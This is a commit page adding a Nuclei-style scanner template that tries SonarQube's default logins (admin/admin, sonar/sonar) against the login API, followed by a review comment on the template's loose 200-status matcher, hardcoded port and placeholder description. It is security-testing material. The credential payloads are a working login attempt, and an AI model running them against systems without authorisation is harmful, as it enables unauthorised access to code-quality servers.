Add files via upload
This template checks if Sonarqube assets accept default credentials
patch-1
parent
1321174731
commit
a5e06fd380
|
@ -0,0 +1,32 @@
|
||||||
|
id: sonarqube-default-credential
|
||||||
|
info:
|
||||||
|
name: Sonarqube Default Credential Login
|
||||||
|
author: Ep1cSage
|
||||||
|
severity: critical
|
||||||
|
description: description
|
||||||
|
reference:
|
||||||
|
- https://docs.sonarsource.com/sonarqube/9.6/instance-administration/security/#:~:text=When%20installing%20SonarQube%2C%20a%20default,Password%3A%20admin
|
||||||
|
tags: sonarqube
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |-
|
||||||
|
POST /api/authentication/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Referer: http://{{Hostname}}:9000/sessions/new
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Origin: http://{{Hostname}}:9000
|
||||||
|
|
||||||
|
{{credentials}}
|
||||||
|
|
||||||
|
attack: batteringram
|
||||||
|
payloads:
|
||||||
|
credentials:
|
||||||
|
- login=sonar&password=sonar
|
||||||
|
- login=admin&password=admin
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- HTTP/1.1 200
|
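Review bot: The only matcher, a `word` match on `HTTP/1.1 200` in the header part, will report a critical default-credential finding for any host that answers this POST with a 200, whether or not it is SonarQube or the login succeeded, and it will miss servers whose status line is not HTTP/1.1. Matching the code with `type: status` and also requiring a login-specific signal would cut the false positives; as far as I know SonarQube sets a `JWT-SESSION` cookie on successful authentication, but that should be confirmed against a test instance before merging. Separately, the `Referer` and `Origin` headers force `http://` and append `:9000` to `{{Hostname}}`, which already carries the target's port when one is given, so `Origin: {{BaseURL}}` would follow the actual target. `description: description` is still a placeholder, and the `sonar`/`sonar` pair does not appear to be covered by the referenced documentation link, which points at the admin/admin default.

```yaml
    # … unchanged: raw request, attack, payloads …
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "JWT-SESSION"   # confirm cookie name against a test instance
```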